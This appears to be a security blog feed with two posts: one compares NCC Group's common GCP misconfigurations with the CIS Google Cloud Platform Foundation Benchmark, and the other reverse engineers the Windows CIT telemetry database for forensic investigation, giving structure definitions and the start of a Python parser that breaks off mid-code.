This time we will take a closer look at what the CIS Google Cloud Platform Foundation Benchmark offers against 10 of the most common GCP misconfigurations that NCC Group comes across during client assessments. These were previously discussed in our blog post called Securing Google Cloud Platform – Ten best practices [2]. In addition, at the end of the post we will see if the CIS Benchmark is indeed in line with the recommendations from the engagements in real life. The top 10 best practices will be extended if possible with the benchmark recommendations and called out if anything is missing. The best practices are often related to misconfigurations in a service, so the post will group them together around the related service if possible.

NCC Top 10 best practices vs CIS Google Cloud Platform Foundation Benchmark

Resource Segregation

The first recommendation was segregate resources by projects to create isolation boundaries and ensure that projects contain the resources that are related to the project.

The benchmark automatically assumes resource segregation as stated in the Overview section: “Most of the recommendations provided with this release of the benchmark cover security considerations only at the individual project level and not at the organization level.”. [1] Even though there is no recommendation in the categories, there are some for separation of duties.

The CIS Benchmark has the following recommendations related to separation, segmentation and segregation:

  • Ensure That Separation of Duties Is Enforced While Assigning Service Account Related Roles to Users
  • Ensure That Separation of Duties Is Enforced While Assigning KMS Related Roles to Users

Although the benchmark already assumes project level segregation, it adds some more recommendations for IAM separation which is also related to the next main area.

IAM

Next in the list were two IAM security related best practices: limit the use of cloud IAM primitive roles and rotate cloud IAM service account access keys periodically. The primitive roles are not following the principal of least privileges and should be avoided. Instead, predefined roles by GCP are the recommended way to assign to groups or users. Service account access keys are highly sensitive, because they could belong to an application or an instance and in case of compromise, an attacker would be able to access and interact with those resources accessible by the service account in the GCP environment.

The CIS Benchmark has the following recommendations for IAM:

  • Ensure that Corporate Login Credentials are Used
  • Ensure that Multi-Factor Authentication is ‘Enabled’ for All Non-Service Accounts
  • Ensure that Security Key Enforcement is Enabled for All Admin Accounts
  • Ensure That There Are Only GCP-Managed Service Account Keys for Each Service Account
  • Ensure That Service Account Has No Admin Privileges
  • Ensure That IAM Users Are Not Assigned the Service Account User or Service Account Token Creator Roles at Project Level
  • Ensure User-Managed/External Keys for Service Accounts Are Rotated Every 90 Days or Fewer
  • Ensure API Keys Are Rotated Every 90 Days

We can see that the benchmark includes the same recommendations with more controls around authentication and authorization to reduce the risk of an attacker elevating privileges or performing successful password attacks and to limit the radius of a compromised account.

Network Security

Another important category was network security where NCC Group often examine overly permissive firewall rules and disabled VPC flow logs in client environments. It is important to lock down the network while allowing network communications only between hosts who are required to communicate, so that attack vectors are minimized and lateral movement across virtual machines and networks can be prevented.

The CIS Benchmark has the following recommendations for Networks:

  • Ensure That DNSSEC Is Enabled for Cloud DNS
  • Ensure That RSASHA1 Is Not Used for the Key-Signing Key in Cloud DNS DNSSEC
  • Ensure That RSASHA1 Is Not Used for the Zone-Signing Key in Cloud DNS DNSSEC
  • Ensure That SSH Access Is Restricted From the Internet
  • Ensure That RDP Access Is Restricted From the Internet
  • Ensure that VPC Flow Logs is Enabled for Every Subnet in a VPC Network
  • Ensure No HTTPS or SSL Proxy Load Balancers Permit SSL Policies With Weak Cipher Suites
  • Use Identity Aware Proxy (IAP) to Ensure Only Traffic From Google IP Addresses are ‘Allowed’

We can see that the benchmark break security controls into smaller and specific recommendations for securing networks and extends its jurisdiction to DNS, SSL and IAP. It is worth noting that some of the network security settings are discussed or mentioned in other sections as well where the actual service recommendations are defined, for example Cloud SQL and the corresponding firewall rules.

Cloud Storage

One of the most often used services after Compute Engine is Cloud Storage Buckets which often hold sensitive data. More often than not the principal of least privilege is not applied and either the “allAuthenticatedUsers” or “allUsers” have access to a storage bucket. In addition, the available access and administrative modification logs play a big role in a successful security incident investigation.

The CIS Benchmark has the following recommendations for Cloud Storage Bucket:

  • Ensure That Cloud Storage Bucket Is Not Anonymously or Publicly Accessible
  • Ensure That Cloud Storage Buckets Have Uniform Bucket-Level Access Enabled
  • Ensure That Cloud Audit Logging Is Configured Properly Across All Services and All Users From a Project

The CIS Google Foundation Benchmark splits the recommendation here but at the end they were the same as in the ten best practices.

Compute Engine

The most used service is the Compute Engine service that works with application configurations and customer data. People would possibly expect the highest focus of security, but instances were still identified without snapshots that would enable data disk recovery in case of application or virtual machine crash that could corrupt any data.

The CIS Benchmark has the following recommendations for Compute Engine:

  • Ensure That Instances Are Not Configured To Use the Default Service Account
  • Ensure That Instances Are Not Configured To Use the Default Service Account With Full Access to All Cloud APIs
  • Ensure “Block Project-Wide SSH Keys” Is Enabled for VM Instances
  • Ensure Oslogin Is Enabled for a Project
  • Ensure ‘Enable Connecting to Serial Ports’ Is Not Enabled for VM Instance
  • Ensure That IP Forwarding Is Not Enabled on Instances
  • Ensure VM Disks for Critical VMs Are Encrypted With Customer-Supplied Encryption Keys (CSEK)
  • Ensure Compute Instances Are Launched With Shielded VM Enabled
  • Ensure That Compute Instances Do Not Have Public IP Addresses
  • Ensure That App Engine Applications Enforce HTTPS Connections
  • Ensure That Compute Instances Have Confidential Computing Enabled
  • Ensure the Latest Operating System Updates Are Installed On Your Virtual Machines in All Projects

The CIS benchmark emphasizes here more on hardening side of security for an instance with built-in security features, limiting access to the virtual machines and securing the communication channels. Interestingly, enabling backups or snapshots was not in the list of the recommendations. This will probably be in the next release, as the benchmark is constantly revised to contain the latest information.

Cloud SQL

Another service that is often utilized by many companies are relational databases. Unfortunately, they are usually identified without a way for recovering lost data in Cloud SQL instances and therefore exposed to risk of losing data.

The CIS Benchmark has the following recommendations for Cloud SQL:

  • Ensure That the Cloud SQL Database Instance Requires All Incoming Connections To Use SSL
  • Ensure That Cloud SQL Database Instances Do Not Implicitly Whitelist All Public IP Addresses
  • Ensure That Cloud SQL Database Instances Do Not Have Public IPs
  • Ensure That Cloud SQL Database Instances Are Configured With Automated Backups
  • Ensure That Cloud Audit Logging Is Configured Properly Across All Services and All Users From a Project

In addition to the automatic backup recommendation, we can see in the list that additional network access and secure communication channel related security controls are mentioned.

Logging and Monitoring

In general, enabling audit logging will provide exceptional value during security incident investigation and allow creating alerts that could be the first signal of an ongoing attack. Alerts will notify the cloud administrators and security people in case of administrative changes in multiple services.

The CIS Benchmark has the following recommendations for Logging and Monitoring:

  • Ensure That Cloud Audit Logging Is Configured Properly Across All Services and All Users From a Project
  • Ensure That Sinks Are Configured for All Log Entries
  • Ensure Log Metric Filter and Alerts Exist for Project Ownership Assignments/Changes
  • Ensure That the Log Metric Filter and Alerts Exist for Audit Configuration Changes
  • Ensure That the Log Metric Filter and Alerts Exist for Custom Role Changes
  • Ensure That the Log Metric Filter and Alerts Exist for VPC Network Firewall Rule Changes
  • Ensure That the Log Metric Filter and Alerts Exist for VPC Network Route Changes
  • Ensure That the Log Metric Filter and Alerts Exist for VPC Network Changes
  • Ensure That the Log Metric Filter and Alerts Exist for Cloud Storage IAM Permission Changes
  • Ensure That the Log Metric Filter and Alerts Exist for SQL Instance Configuration Changes
  • Ensure That Cloud DNS Logging Is Enabled for All VPC Networks

The CIS Google Security Foundation Benchmark here emphasizes on log metric filtering with alerts on permissions, modifications and configuration changes related to specific services in addition to the general audit logging across all services.

Conclusion

In conclusion, the new CIS Google Cloud Computing Platform Benchmark offers powerful best practices that companies can introduce to improve their baseline security of GCP deployments – and furthermore, these best practices can help to mitigate many of the most common security issues we find in real-world environments during our security testing. As we have seen before with the CIS Microsoft 365 Security Foundation Benchmark, these benchmarks offer plenty of recommendations that a company can start with and apply to prevent the most common mistakes and misconfigurations before moving on to more advanced security controls and defenses in the cloud environment.

References

[1] CIS Google Cloud Platform Foundation Benchmark: https://www.cisecurity.org/benchmark/google_cloud_computing_platform

[2] Securing Google Cloud Platform – Ten best practices: https://research.nccgroup.com/2018/10/12/securing-google-cloud-platform-ten-best-practices/

[3] Shaking The Foundation of An Online Collaboration Tool: Microsoft 365 Top 5 Attacks vs the CIS Microsoft 365 Foundation Benchmark:
https://research.nccgroup.com/2022/02/18/shaking-the-foundation-of-an-online-collaboration-tool-microsoft-365-top-5-attacks-vs-the-cis-microsoft-365-foundation-benchmark/

A brief look at Windows telemetry: CIT aka Customer Interaction Tracker

12 April 2022 at 14:06

tl;dr

  • Windows version up to at least version 7 contained a telemetry source called Customer Interaction Tracker
  • The CIT database can be parsed to aid forensic investigation
  • Finally, we also provide code to parse the CIT database yourself. We have implemented all of these findings into our previously mentioned investigation framework, which enables us to use them on all types of evidence data that we encounter.

Introduction

About 2 years ago while I was working on a large compromise assessment, I had extra time available to do a little research. For a compromise assessment, we take a forensic snapshot of everything that is in scope. This includes various log or SIEM sources, but also includes a lot of host data. This host data can vary from full disk images, such as those from virtual machines, to smaller, forensically acquired, evidence packages. During this particular compromise assessment, we had host data from about 10,000 machines. An excellent opportunity for large scale data analysis, but also a huge set of data to test new parsers on, or find less common edge cases for existing parsers! During these assignments we generally also take some time to look for new and interesting pieces of data to analyse. We don’t often have access to such a large and varied dataset, so we take advantage of it while we can.

Around this time I also happened to stumble upon the excellent blog posts from Maxim Suhanov over at dfir.ru. Something that caught my eye was his post about the CIT database in Windows. It may or may not stand for “Customer Interaction Tracker” and is one of the telemetry systems that exist within Windows, responsible for tracking interaction with the system and applications. I’d never heard of it before, and it seemed relatively unknown as his post was just about the only reference I could find about it. This, of course, piqued my interest, as it’s more fun exploring new and unknown data sources in contrast to well documented sources. And since I now had access to about 10k hosts, it seemed like as good a time as any to see if I could expore a little bit further than he had.

While Maxim does hypothesise about the purpose of the CIT database, he doesn’t describe much about how it is structured. It’s an LZNT1 compressed blob stored in the Windows registry at HKLM\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\System that, when decompressed, has some executable paths in there. Nothing seems to be known about how to parse this binary blob. So called “grep forensics”, while having its’ place, doesn’t scale, and you might be missing crucial pieces of information from the unparsed data. I’m also someone who takes comfort in knowing exactly how something is structured, without too many hypotheses and guesses.

In my large dataset I had plenty of CIT databases, so I could compare them and possibly spot patterns on how to parse this blob, so that’s exactly what I set out to do. Fast iteration with dissect.cstruct and a few hours of eyeballing hexdumps later, I came up with some structures on how I thought the data might be stored.

struct header {
uint16 unk0;
uint16 unk1;
uint32 size;
uint64 timestamp;
uint64 unk2;
uint32 num_entry1;
uint32 entry1_offset;
uint32 block1_size;
uint32 block1_offset;
uint32 num_entry2;
uint32 entry2_offset;
uint64 timestamp2;
uint64 timestamp3;
uint32 unk9;
uint32 unk10;
uint32 unk11;
uint32 unk12;
uint32 unk13;
uint32 unk14;
};
// <snip>
struct entry1 {
uint32 entry3_offset;
uint32 entry2_offset;
uint32 entry3_size;
uint32 entry2_size;
};
// <snip>
struct entry3 {
uint32 path_offset;
uint32 unk0;
uint32 unk1;
uint32 unk2;
uint32 unk3;
uint32 unk4;
uint32 unk5;
};
view raw CITDB.h hosted with ❤ by GitHub

While still incredibly rough, I figured I had a rudimentary understanding of how the CIT was stored. However, at the time it was hardly a practical improvement over just “extracting the strings”, except perhaps that the parsing was a bit more efficient when compared to extracting strings. It did scratch initial my itch on figuring out how it might be stored, but I didn’t want to spend a lot more time on it at the time. I added it as a plugin in our investigation framework called dissect, ran it over all the host data we had and used it as an additional source of information during the remainder of the compromise assessment. I figured I’d revisit some other time.

Revisiting

Some other time turned out to be a lot farther into the future than I had anticipated. On an uneventful friday afternoon a few weeks ago, at the time of writing, and 2 years after my initial look, I figured I’d give the CIT another shot. This time I’d go about it with my usual approach, given that I had more time available now. That approach roughly consists of finding whatever DLL, driver or part of the Windows kernel is responsible for some behaviour, reverse engineering it and writing my own implementation. This is my preferred approach if I have a bit more time available, since it leaves little room for wrongful hypotheses and own interpretation, and grounds your implementation in mostly facts.

Approach

My usual approach starts with scraping the disk of one of my virtual machines with some byte pattern, usually a string in various encodings (UTF-8 and UTF-16-LE, the default string encoding in Windows, for example) in search of files that contain those strings or byte patterns. For this we can utilize our dissect framework that, among its many capabilities, allows us to easily search for occurrences of data within any data container, such as (sparse) VMDK files or other types of disk images. We can combine this with a filesystem parser to see if a hit is within the dataruns of a file, and report which files have hits. This process only takes a few minutes and I immediately get an overview of all the files on my entire filesystem that may have a reference to something I’m looking for.

In this case, I used part of the registry path where the CIT database is stored. Using this approach, I quickly found a couple of DLLs that looked interesting, but a quick inspection revealed only one that was truly of interest: generaltel.dll. This DLL, among other things, seems to be responsible for consuming the CIT database and its records, and emitting telemetry ETW messages.

Reverse engineering

Through reverse engineering the parsing code and looking at how the ETW messages are constructed, we can create some fairly complete looking structures to parse the CIT database.

typedef struct _CIT_HEADER {
WORD MajorVersion;
WORD MinorVersion;
DWORD Size; /* Size of the entire buffer */
FILETIME CurrentTimeLocal; /* Maybe the time when the saved CIT was last updated? */
DWORD Crc32; /* Crc32 of the entire buffer, skipping this field */
DWORD EntrySize;
DWORD EntryCount;
DWORD EntryDataOffset;
DWORD SystemDataSize;
DWORD SystemDataOffset;
DWORD BaseUseDataSize;
DWORD BaseUseDataOffset;
FILETIME StartTimeLocal; /* Presumably when the aggregation started */
FILETIME PeriodStartLocal; /* Presumably the starting point of the aggregation period */
DWORD AggregationPeriodInS; /* Presumably the duration over which this data was gathered
* Always 604800 (7 days) */
DWORD BitPeriodInS; /* Presumably the amount of seconds a single bit represents
* Always 3600 (1 hour) */
DWORD SingleBitmapSize; /* This appears to be the sizes of the Stats buffers, always 21 */
DWORD _Unk0; /* Always 0x00000100? */
DWORD HeaderSize;
DWORD _Unk1; /* Always 0x00000000? */
} CIT_HEADER;
typedef struct _CIT_PERSISTED {
DWORD BitmapsOffset; /* Array of Offset and Size (DWORD, DWORD) */
DWORD BitmapsSize;
DWORD SpanStatsOffset; /* Array of Count and Duration (DWORD, DWORD) */
DWORD SpanStatsSize;
DWORD StatsOffset; /* Array of WORD */
DWORD StatsSize;
} CIT_PERSISTED;
typedef struct _CIT_ENTRY {
DWORD ProgramDataOffset; /* Offset to CIT_PROGRAM_DATA */
DWORD UseDataOffset; /* Offset to CIT_PERSISTED */
DWORD ProgramDataSize;
DWORD UseDataSize;
} CIT_ENTRY;
typedef struct _CIT_PROGRAM_DATA {
DWORD FilePathOffset; /* Offset to UTF-16-LE file path string */
DWORD FilePathSize; /* strlen of string */
DWORD CommandLineOffset; /* Offset to UTF-16-LE command line string */
DWORD CommandLineSize; /* strlen of string */
DWORD PeTimeDateStamp; /* aka Extra1 */
DWORD PeCheckSum; /* aka Extra2 */
DWORD Extra3; /* aka Extra3, some flag from PROCESSINFO struct */
} CIT_PROGRAM_DATA;
view raw CITDB2.h hosted with ❤ by GitHub

When compared against the initial guessed structures, we can immediately get a feeling for the overall format of the CIT. Decompressed, the CIT is made up of a small header, a global “system use data”, a global “use data” and a bunch of entries. Each entry has its’ own “use data” as well as references to a file path and optional command line string.

Interpreting the data

Figuring out how to parse data is the easy part, interpreting this data is oftentimes much harder.

Looking at the structures we came up with, we have something called “use data” that contains some bitmaps, “stats” and “span stats”. Bitmaps are usually straightforward since there are only so many ways you can interpret those, but “stats” and “span stats” can mean just about anything. However, we still have the issue that the “system use data” has multiple bitmaps.

To more confidently interpet the data, it’s best we look at how it’s created. Further reverse engineering brings us to wink32base.sys, win32kfull.sys for newer Windows versions (e.g. Windows 10+), and win32k.sys for older Windows versions (e.g. Windows 7, Server 2012).

In the CIT header, we can see a BitPeriodInS, SingleBitmapSize and AggregationPeriodInS. With some values from a real header, we can confirm that (BitPeriodInS * 8) * SingleBitmapSize = AggregationPeriondInS. We also have a PeriodStartLocal field which is usually a nicely rounded timestamp. From this, we can make a fairly confident assumption that for every bit in the bitmap, the application in the entry or the system was used within a BitPeriodInS time window. This means that the bitmaps track activity over a larger time period in some period size, by default an hour. Reverse engineered code seems to support this, too. Note that all of this is in local time, not UTC.

For the “stats” or “span stats”, it’s not that easy. We have no indication of what these values might mean, other than their integer size. The parsing code seems to suggest they might be tuples, but that may very well be a compiler optimization. We at least know they aren’t offsets, since their values are often far larger than the size of the CIT.

Further reverse engineering win32k.sys seems to suggest that the “stats” are in fact individual counters, being incremented in functions such as CitSessionConnectChange, CitDesktopSwitch, etc. These functions get called from other relevant functions in win32k.sys, like xxxSwitchDesktop that calls CitDesktopSwitch. One of the smaller increment functions can be seen below as an example:

void __fastcall CitThreadGhostingChange(tagTHREADINFO *pti)
{
struct _CIT_USE_DATA *UseData; // rax
__int16 v2; // cx
if ( g_CIT_IMPACT_CONTEXT )
{
if ( _bittest((const signed __int32 *)&pti->TIF_flags, 0x1Fu) )
{
UseData = CitpProcessGetUseData(pti->ppi);
if ( UseData )
{
v2 = –1;
if ( (unsigned __int16)(UseData->Stats.ThreadGhostingChanges + 1) >= UseData->Stats.ThreadGhostingChanges )
v2 = UseData->Stats.ThreadGhostingChanges + 1;
UseData->Stats.ThreadGhostingChanges = v2;
}
}
}
}

The increment events are different between the system use data and the program use data. If we map these increments out to the best of our ability, we end up with the following structures:

struct _CIT_SYSTEM_DATA_STATS
{
WORD Unknown_BootIdRelated0;
WORD Unknown_BootIdRelated1;
WORD Unknown_BootIdRelated2;
WORD Unknown_BootIdRelated3;
WORD Unknown_BootIdRelated4;
WORD SessionConnects;
WORD ProcessForegroundChanges;
WORD ContextFlushes;
WORD MissingProgData;
WORD DesktopSwitches;
WORD WinlogonMessage;
WORD WinlogonLockHotkey;
WORD WinlogonLock;
WORD SessionDisconnects;
};
struct _CIT_USE_DATA_STATS
{
WORD Crashes;
WORD ThreadGhostingChanges;
WORD Input;
WORD InputKeyboard;
WORD Unknown;
WORD InputTouch;
WORD InputHid;
WORD InputMouse;
WORD MouseLeftButton;
WORD MouseRightButton;
WORD MouseMiddleButton;
WORD MouseWheel;
};
view raw CITStruct.h hosted with ❤ by GitHub

There are some interesting tracked statistics here, such as the amount of times someone logged on, locked their system, or how many times they clicked or pressed a key in an application.

We can see similar behaviour for “span stats”, but in this case it appears to be a pair of (count, duration). Similarly, if we map these increments out to the best of our ability, we end up with the following structures:

struct _CIT_SPAN_STAT_ITEM
{
  DWORD Count;
  DWORD Duration;
};
struct _CIT_SYSTEM_DATA_SPAN_STATS
{
  _CIT_SPAN_STAT_ITEM ContextFlushes0;
  _CIT_SPAN_STAT_ITEM Foreground0;
  _CIT_SPAN_STAT_ITEM Foreground1;
  _CIT_SPAN_STAT_ITEM DisplayPower0;
  _CIT_SPAN_STAT_ITEM DisplayRequestChange;
  _CIT_SPAN_STAT_ITEM DisplayPower1;
  _CIT_SPAN_STAT_ITEM DisplayPower2;
  _CIT_SPAN_STAT_ITEM DisplayPower3;
  _CIT_SPAN_STAT_ITEM ContextFlushes1;
  _CIT_SPAN_STAT_ITEM Foreground2;
  _CIT_SPAN_STAT_ITEM ContextFlushes2;
};
struct _CIT_USE_DATA_SPAN_STATS
{
  _CIT_SPAN_STAT_ITEM ProcessCreation0;
  _CIT_SPAN_STAT_ITEM Foreground0;
  _CIT_SPAN_STAT_ITEM Foreground1;
  _CIT_SPAN_STAT_ITEM Foreground2;
  _CIT_SPAN_STAT_ITEM ProcessSuspended;
  _CIT_SPAN_STAT_ITEM ProcessCreation1;
};
view raw CITStruct2.h hosted with ❤ by GitHub

Finally, when looking for all references to the bitmaps, we can identify the following bitmaps stored in the “system use data”:

struct _CIT_SYSTEM_DATA_BITMAPS
{
_CIT_BITMAP DisplayPower;
_CIT_BITMAP DisplayRequestChange;
_CIT_BITMAP Input;
_CIT_BITMAP InputTouch;
_CIT_BITMAP Unknown;
_CIT_BITMAP Foreground;
};

We can also identify that the single bitmap linked to each program entry is a bitmap of “foreground” activity for the aggregation period.

In the original source, I suspect these fields are accessed by index with an enum, but mapping them to structs makes for easier reverse engineering. You can also still see some unknowns in there, or unspecified fields such as Foreground0 and Foreground1. This is because the differentiation between these is currently unclear. For example, both counters might be incremented upon a foreground switch, but only one of them when a specific flag or condition is true. The exact condition or meaning of the flag is currently unknown.

Newer Windows versions

During the reverse engineering of the various win32k modules, I noticed something disappointing: the CIT database seems to no longer exist in the same form on newer Windows versions. Some of the same code remains and some new code was introduced, but any relation to the stored CIT database as described up until now seems to no longer exists. Maybe it’s now handled somewhere else and I couldn’t find it, but I also haven’t encountered any recent Windows host that has had CIT data stored on it.

Something else seems to have taken its place, though. We have some stored DP and PUUActive (Post Update Use Info) data instead. If the running Windows version is a “multi-session SKU”, as determined by the RtlIsMultiSessionSku API, these values are stored under the key HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon. Otherwise, they are stored under HKLM\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT.

Post Update Use Info

We can apply the same technique here as we did with the older CIT database, which is to look at how ETW messages are being created from the data. A little bit of reversing later and we get the following structure:

typedef struct _CIT_POST_UPDATE_USE_INFO {
DWORD UpdateKey;
WORD UpdateCount;
WORD CrashCount;
WORD SessionCount;
WORD LogCount;
DWORD UserActiveDurationInS;
DWORD UserOrDispActiveDurationInS;
DWORD DesktopActiveDurationInS;
WORD Version;
WORD _Unk0;
WORD BootIdMin;
WORD BootIdMax;
DWORD PMUUKey;
DWORD SessionDurationInS;
DWORD SessionUptimeInS;
DWORD UserInputInS;
DWORD MouseInputInS;
DWORD KeyboardInputInS;
DWORD TouchInputInS;
DWORD PrecisionTouchpadInputInS;
DWORD InForegroundInS;
DWORD ForegroundSwitchCount;
DWORD UserActiveTransitionCount;
DWORD _Unk1;
FILETIME LogTimeStart;
QWORD CumulativeUserActiveDurationInS;
WORD UpdateCountAccumulationStarted;
WORD _Unk2;
DWORD BuildUserActiveDurationInS;
DWORD BuildNumber;
DWORD _UnkDeltaUserOrDispActiveDurationInS;
DWORD _UnkDeltaTime;
DWORD _Unk3;
} CIT_POST_UPDATE_USE_INFO;

Looks like we lost the information for individual applications, but we still get a lot of usage data.

DP

Once again we can apply the same technique, resulting in the following:

typedef struct _CIT_DP_MEMOIZATION_ENTRY {
DWORD Unk0;
DWORD Unk1;
DWORD Unk2;
} CIT_DP_MEMOIZATION_ENTRY;
typedef struct _CIT_DP_MEMOIZATION_CONTEXT {
_CIT_DP_MEMOIZATION_ENTRY Entries[12];
} CIT_DP_MEMOIZATION_CONTEXT;
typedef struct _CIT_DP_DATA {
WORD Version;
WORD Size;
WORD LogCount;
WORD CrashCount;
DWORD SessionCount;
DWORD UpdateKey;
QWORD _Unk0;
FILETIME _UnkTime;
FILETIME LogTimeStart;
DWORD ForegroundDurations[11];
DWORD _Unk1;
_CIT_DP_MEMOIZATION_CONTEXT MemoizationContext;
} CIT_DP_DATA;
view raw CITDP.h hosted with ❤ by GitHub

I haven’t looked too deeply into the memoization shown here, but it’s largely irrelevant when parsing the data. We see some of the same fields we also saw in the PUU data, but also a ForegroundDurations array. This appears to be an array of foreground durations in milliseconds for a couple of hardcoded applications:

  • Microsoft Internet Explorer
    • IEXPLORE.EXE
  • Microsoft Edge
    • MICROSOFTEDGE.EXE, MICROSOFTEDGECP.EXE, MICROSOFTEDGEBCHOST.EXE, MICROSOFTEDGEDEVTOOLS.EXE
  • Google Chrome
    • CHROME.EXE
  • Microsoft Word
    • WINWORD.EXE
  • Microsoft Excel
    • EXCEL.EXE
  • Mozilla Firefox
    • FIREFOX.EXE
  • Microsoft Photos
    • MICROSOFT.PHOTOS.EXE
  • Microsoft Outlook
    • OUTLOOK.EXE
  • Adobe Acrobat Reader
    • ACRORD32.EXE
  • Microsoft Skype
    • SKYPE.EXE

Each application is given an index in this array, starting from 1. Index 0 appears to be reserved for a cumulative time. It is not currently known if this list of applications changes between Windows versions. It’s also not currently known what “DP” stands for.

Other findings

While looking for some test CIT data, I stumbled upon two other pieces of information stored in the registry under the CIT registry key.

Telemetry answers

This information is stored at the registry key HKLM\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\win32k, under a subkey of some arbitrary version number. It contains values with the value name being the ImageFileName of the process, and the value being a flag indicating what types of messages or telemetry this application received during its lifetime. For example, the POWERBROADCAST flag is set if NtUserfnPOWERBROADCAST is called on a process, which itself it called from NtUserMessageCall. Presumably a system message if the power state of the system changed (e.g. a charger was plugged in). Currently known values are:

POWERBROADCAST = 0x10000
DEVICECHANGE = 0x20000
IME_CONTROL = 0x40000
WINHELP = 0x80000
view raw Knownvalues.h hosted with ❤ by GitHub

You can discover which events a process received by masking the stored value with these values. For example, the value 0x30000 can be interpreted as POWERBROADCAST|DEVICECHANGE, meaning that a process received those events.

This behaviour was only present in a Windows 7 win32k.sys and seems to no longer be present in more recent Windows versions. I have also seen instances where the values 4 and 8 were used, but have not been able to find a corresponding executable that produces these values. In most win32k.sys the code for this is inlined, but in some the function name AnswerTelemetryQuestion can be seen.

Modules

Another interesting registry key is HKLM\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\Module. It has subkeys for certain runtime DLLs (for example, System32/mrt100.dll or Microsoft.NET/Framework64/v4.0.30319/clr.dll), and each subkey has values for applications that have loaded this module. The name of the value is once again the ImageFileName and the value is a standard Windows timestamp of when the value was written.

These values are written by ahcache.sys, function CitmpLogUsageWorker. This function is called from CitmpLoadImageCallback, which subsequently is the callback function provided to PsSetLoadImageNotifyRoutine. The MSDN page for this function says that this call registers a “driver-supplied callback that is subsequently notified whenever an image is loaded (or mapped into memory)”. This callback checks a couple of conditions. First, it checks if the module is loaded from a system partition, by checking the DO_SYSTEM_SYSTEM_PARTITION flag of the underlying device. Then it checks if the image it’s loading is from a set of tracked modules. This list is optionally read from the registry key HKLM\System\CurrentControlSet\Control\Session Manager\AppCompatCache and value Citm, but has a default list to fall back to. The version of ahcache.sys that I analysed contained:

  • \System32\mrt100.dll
  • Microsoft.NET\Framework\v1.0.3705\mscorwks.dll
  • Microsoft.NET\Framework\v1.0.3705\mscorsvr.dll
  • Microsoft.NET\Framework\v1.1.4322\mscorwks.dll
  • Microsoft.NET\Framework\v1.1.4322\mscorsvr.dll
  • Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
  • \Microsoft.NET\Framework\v4.0.30319\clr.dll
  • \Microsoft.NET\Framework64\v4.0.30319\clr.dll
  • \Microsoft.NET\Framework64\v2.0.50727\mscorwks.dll

The tracked module path is concatenated to the aforementioned registry key to, for example, result in the key HKLM\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\Module\Microsoft.NET/Framework/v1.0.3705/mscorwks.dll. Note the replaced path separators to not conflict with the registry path separator. It does a final check if there are not more than 64 values already in this key, or if the ImageFileName of the executable exceeds 520 characters. In the first case, the current system time is stored in the OverflowQuota value. In the second case, the value name OverflowValue is used.

So far I haven’t found anything that actually removes values from this registry key, so OverflowQuota effectively contains the timestamp of the last execution to load that module, but which already had more than 64 values. If these values are indeed never removed, it unfortunately means that these registry keys only contain the first 64 executables to load these modules.

This behaviour seems to be present from Windows 10 onwards.

Summary

We showed how to parse the CIT database and provide some additional information on what it stores. The information presented may not be perfect, but this was just a couple of days worth of research into CIT. We hope it’s useful to some and perhaps also a showcase of a method to quickly research topics like these.

We also discovered the lack of the CIT database on newer Windows versions, and these new DP and PUUActive values. We provided some information on what these structures contain and structure definitions to easily parse them.

Finally, we also provide code to parse the CIT database yourself. It’s just the code to parse the CIT contents and doesn’t do anything to access the registry. There’s also no code to parse the other mentioned registry keys, since registry access is very implementation specific between investigation tools, and the values are quite trivial to parse out. We have implemented all of these findings into our investigation framework, which enables us to use them on all types of evidence data that we encounter.

We invite anyone curious on this topic to provide feedback and information for anything we may have missed or misinterpreted.

Source

#!/usr/bin/env python3
import array
import argparse
import io
import struct
import sys
from binascii import crc32
from datetime import datetime, timedelta, timezone
try:
from dissect import cstruct
from Registry import Registry
except ImportError:
print("Missing dependencies, run:\npip install dissect.cstruct python-registry")
sys.exit(1)
try:
from zoneinfo import ZoneInfo
HAS_ZONEINFO = True
except ImportError:
HAS_ZONEINFO = False
cit_def = """
typedef QWORD FILETIME;
flag TELEMETRY_ANSWERS {
POWERBROADCAST = 0x10000,
DEVICECHANGE = 0x20000,
IME_CONTROL = 0x40000,
WINHELP = 0x80000,
};
typedef struct _CIT_HEADER {
WORD MajorVersion;
WORD MinorVersion;
DWORD Size; /* Size of the entire buffer */
FILETIME CurrentTimeLocal; /* Maybe the time when the saved CIT was last updated? */
DWORD Crc32; /* Crc32 of the entire buffer, skipping this field */
DWORD EntrySize;
DWORD EntryCount;
DWORD EntryDataOffset;
DWORD SystemDataSize;
DWORD SystemDataOffset;
DWORD BaseUseDataSize;
DWORD BaseUseDataOffset;
FILETIME StartTimeLocal; /* Presumably when the aggregation started */
FILETIME PeriodStartLocal; /* Presumably the starting point of the aggregation period */
DWORD AggregationPeriodInS; /* Presumably the duration over which this data was gathered
* Always 604800 (7 days) */
DWORD BitPeriodInS; /* Presumably the amount of seconds a single bit represents
* Always 3600 (1 hour) */
DWORD SingleBitmapSize; /* This appears to be the sizes of the Stats buffers, always 21 */
DWORD _Unk0; /* Always 0x00000100? */
DWORD HeaderSize;
DWORD _Unk1; /* Always 0x00000000? */
} CIT_HEADER;
typedef struct _CIT_PERSISTED {
DWORD BitmapsOffset; /* Array of Offset and Size (DWORD, DWORD) */
DWORD BitmapsSize;
DWORD SpanStatsOffset; /* Array of Count and Duration (DWORD, DWORD) */
DWORD SpanStatsSize;
DWORD StatsOffset; /* Array of WORD */
DWORD StatsSize;
} CIT_PERSISTED;
typedef struct _CIT_ENTRY {
DWORD ProgramDataOffset; /* Offset to CIT_PROGRAM_DATA */
DWORD UseDataOffset; /* Offset to CIT_PERSISTED */
DWORD ProgramDataSize;
DWORD UseDataSize;
} CIT_ENTRY;
typedef struct _CIT_PROGRAM_DATA {
DWORD FilePathOffset; /* Offset to UTF-16-LE file path string */
DWORD FilePathSize; /* strlen of string */
DWORD CommandLineOffset; /* Offset to UTF-16-LE command line string */
DWORD CommandLineSize; /* strlen of string */
DWORD PeTimeDateStamp; /* aka Extra1 */
DWORD PeCheckSum; /* aka Extra2 */
DWORD Extra3; /* aka Extra3, some flag from PROCESSINFO struct */
} CIT_PROGRAM_DATA;
typedef struct _CIT_BITMAP_ITEM {
DWORD Offset;
DWORD Size;
} CIT_BITMAP_ITEM;
typedef struct _CIT_SPAN_STAT_ITEM {
